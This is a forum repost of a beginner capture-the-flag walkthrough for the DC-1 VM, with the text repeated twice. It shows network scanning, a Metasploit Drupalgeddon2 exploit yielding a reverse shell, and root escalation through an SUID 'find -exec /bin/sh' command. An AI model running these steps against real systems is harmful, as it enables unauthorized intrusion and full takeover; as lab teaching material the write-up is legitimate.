lilylily1234
Gaming Prodigy
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
400 XP
Hello friends! Today we are going to take another boot2root challenge known as “DC-1: 1”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.
Security Level: Beginner
Penetrating Methodology:
Walkthrough
Let’s start off with scanning the network to find our target.
We found our target –> 192.168.1.104
Our next step is to scan our target with nmap.
The NMAP output shows us that there are 3 ports open: 22(SSH), 80(HTTP), 111(RPC)
We find that port 80 is running http, so we open the IP in our browser.
When we access the web service we find that the server is running Drupal CMS. As the target system is running Drupal CMS, we can check if it is vulnerable to Drupalgeddon2 exploit. We run the exploit usingMetasploiton the target machine and successfully able to get a reverse shell.
After getting a reverse shell we spawn a TTY shell using python. Then we finda filewithsuidpermission on the server and find that the “find” command has SUID bit set.
As “find” command has SUID bit set, we can executethe commandas “root” user. We create a file called “raj” and use “find” command to check if is executing the commands as root user, the reason for creating a file is so that we can use with “find” command. As running it with a single file will run the command only once.
After executing the command “whoami”, we find that we can run commands as root user. We now execute “/bin/bash” using “find” command and are successfully able to spawn a shell asrootuser. We now go to /root directory and find a file called “thefinalflag.txt”. We take a look at the content of the file and find a congratulatory message for completing the VM.
Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiast. Contact Here
Security Level: Beginner
Penetrating Methodology:
- IP Discovery using netdiscover
- Network scanning (Nmap)
- Surfing HTTPS service port (80)
- Finding Drupal CMS
- Exploiting Drupalgeddon2 to geta reverseshell
- Finding files with SUID bit set
- Findingthe “find” command with SUID bit set
- Getting root shell with “find” command
- Getting final flag
Walkthrough
Let’s start off with scanning the network to find our target.
Code:
netdiscoverWe found our target –> 192.168.1.104
Our next step is to scan our target with nmap.
Code:
nmap -sV 192.168.1.104The NMAP output shows us that there are 3 ports open: 22(SSH), 80(HTTP), 111(RPC)
We find that port 80 is running http, so we open the IP in our browser.
When we access the web service we find that the server is running Drupal CMS. As the target system is running Drupal CMS, we can check if it is vulnerable to Drupalgeddon2 exploit. We run the exploit usingMetasploiton the target machine and successfully able to get a reverse shell.
Code:
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.1.104
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > runAfter getting a reverse shell we spawn a TTY shell using python. Then we finda filewithsuidpermission on the server and find that the “find” command has SUID bit set.
Code:
python -c 'import pty; pty.spawn("/bin/bash")'
find / -perm -u=s -type f 2>/dev/nullAs “find” command has SUID bit set, we can executethe commandas “root” user. We create a file called “raj” and use “find” command to check if is executing the commands as root user, the reason for creating a file is so that we can use with “find” command. As running it with a single file will run the command only once.
After executing the command “whoami”, we find that we can run commands as root user. We now execute “/bin/bash” using “find” command and are successfully able to spawn a shell asrootuser. We now go to /root directory and find a file called “thefinalflag.txt”. We take a look at the content of the file and find a congratulatory message for completing the VM.
Code:
touch raj
find raj -exec "whoami" \;
find raj -exec "/bin/sh" \;Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiast. Contact Here